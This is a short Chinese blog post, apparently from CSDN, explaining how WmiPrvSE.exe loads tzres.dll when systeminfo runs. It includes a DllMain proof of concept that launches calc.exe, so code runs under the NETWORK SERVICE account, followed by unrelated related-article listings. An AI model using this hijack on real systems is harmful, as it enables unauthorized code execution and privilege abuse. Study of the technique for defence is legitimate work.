systeminfo、WmiPreSE.exe,dll劫持

最新推荐文章于 2024-05-20 10:27:20 发布
原创 最新推荐文章于 2024-05-20 10:27:20 发布 · 775 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#dll劫持 #白利用

本文探讨了在执行systeminfo命令时,systeminfo.exe如何通过wmi和LPC方式获取数据,以及WmiPrvse.exe加载tzres.dll实现提权的过程。详细解析了DLL劫持原理,并展示了通过修改DLL_PROCESS_ATTACH事件中的代码来创建继承NETWORKSERVICE权限的子进程。

在执行systeminfo命令时,systeminfo.exe内部通过wmi和LPC的方式获取数据,WmiPrvse.exe在执行实际操作时会去加载tzres.dll

在这里插入图片描述
dll路径:C:\Windows\System32\wbem\tzres.dll

#include <stdlib.h>
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc.exe");
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

由于WmiPrvSE.exe是NETWORK SERVICE权限,所以被创建的子进程都继承了这个权限。
在这里插入图片描述

电脑技巧:WmiPrvSE.exe是什么进程?WMI Provider Host占用很高CPU的原因及解决办法
IT技术分享社区
11-03 2万+
遇到此类情况,可以使用 Eventvwr.msc 打开「事件查看器」,导航到「应用程序和服务日志」——「Microsoft」——「Windows」——「WMI-Activity」——「操作」,在错误日志的 ClientProcessId 字段中可以查看到引起问题的进程 PID。例如,通过软件或脚本代码可以查询有关 BitLocker 驱动器加密状态的信息、查看事件日志中的条目,或者通过 WMI Provider 调用当前系统中已安装的应用程序,等等操作。
系统提示缺失systeminfo.dll文件的解决方法
最新发布
xhp618的博客
11-22 223
其实很多用户在运行软件或游戏的时候就出现过这种问题,如果是第一次遇见有的用户会可能认为软件出错了,其实并不是这样。其主要原因就是你电脑系统的systeminfo.dll丢失了或没有安装一些系统运行库所导致的。yx84bc.exe - 系统错误无法启动此程序,因为计算机中丢失 SystemInfo.dll。尝试重新安装该程序以解决此问题。其实很多用户在运行软件或游戏的时候就出现过这种问题,如果是第一次遇见有的用户会可能认为软件出错了,其实并不是这样。
Windows系统缺失tzres.dll文件出现错误提示如何解决?
amio555的专栏
07-05 302
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个tzres.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现tzres.dll丢失要怎么解决?
Win7系统提示找不到tzres.dll文件的解决办法
file
02-07 837
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个tzres.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现tzres.dll丢失要怎么解决?
安装MaxDos7.1后的流氓插件so.dll,wmiprvse.exe,knlrun.sys的清除
生活在别处
09-19 2056
作者:xiao   时间:2009-09-19 16:18:39 主题:so.dll wmiprvse.exe knlrun.sys "browse by name"插件   一、背景知识 昨天发现有残留插件“browse by name”,去网上查资料如何清除,发现被它困扰无法清除是一个普遍现象。 有网友声称是MaxDos安装时所带的插件:http://baike.360.cn/417
WmiPrivSE.exe占用CPU过多的一种解决办法
textfire的专栏
02-17 2950
WmiPrivSE.exe占用内存过多的问题曾经困扰我很久,在网上查过一些解释和解决办法,在我这里都没有起到作用;为此我就逐个地结束进程,有些进程能够结束,而有些进程结束不了,尽量想办法结束。 当我结束进程了一个名叫Update.exe的进程以后,CPU占用率一下子降了下来,之后看了一下这个Update并非是WIndows系统自身的更新程序,而是一个无名小辈起了一个大名子。 如此用了半个多月以
systeminfo.exe.mui
12-28
systeminfo.exe
systeminfo.exe
12-27
systeminfo
上传Windows XP系统工具systeminfo.exe
在该文件信息中,上传了两个文件:`framedyn.dll` 和 `systeminfo.exe`。`framedyn.dll` 是一个动态链接库文件(DLL),它可能是一个系统组件或某个程序运行所需的库文件。上传这类文件通常是为了提供完整的工具包或...
Java_jvm-SystemInfo.zip_java systemin_system info java_system in
09-20
一个安装在不同操作系统的Java虚拟机负责着Java程序与操作系统之间的工作,因此每个Java虚拟机的系统环境属性是不同的,我们可以通过访问Java虚拟机的系统属性来获知一些关于当前操作系统的一些基本信息,这些信息的...
dll 调用exe_内网渗透研究:dll劫持权限维持
weixin_39523280的博客
11-27 646
本文所采用技术,仅用来实现自定义功能,适用场景仅为授权的测试中进行权限维持或为个人电脑添加定制化功能,如:启动QQ同时启动计算器,方便实用~0×01 DLL劫持当一个可执行文件运行时,Windows加载器会将PE(Portable Executable File Format)文件映射到内存中,然后分析可执行文件的导入表,并将相应的DLL文件装入,EXE文件通过导入表找到DLL中相应的函...
遭遇VMIprvse.exe病毒文件把CPU资源耗尽
aaron8219's Oracle&Linux Technology Blog
10-24 4010
今天开了2台虚拟机做实验,还开了XFT
启动应用程序出现tzres.dll找不到问题解决
wbcmbfy的博客
05-20 1020
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个tzres.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现tzres.dll丢失要怎么解决?
tzres.dll文件缺失导致程序无法运行问题
2301_76755223的博客
12-17 790
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个tzres.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现tzres.dll丢失要怎么解决?
计算机各国[时区信息]
weixin_30404405的博客
02-23 413
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones]"TzVersion"=dword:07da0300 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV...
windows 操作系统中 各个DLL 作用简介
热门推荐
或许
09-28 1万+
                          windows  dll 库文件作用和用途 (win7) aaclient.dll 何时何地都可以访问客户端  accessibilitycpl.dll 轻松访问控制面板  acledit.dll 访问控制列表编辑器  aclui.dll 安全描述符编辑器  acppage.dll 兼容性选项卡外壳扩展库  ActionCenter.dll ...
window 系统丢失北京时区解决方案
12-18 8044
window 电脑不存在以下图片中的时区,解决办法 解决方法一: 找一台存在北京时区的电脑,win +r 弹出运行窗口,运行regedit, [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\China Standard Time] 到这一级目录 然后右键导出以下图片中的...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值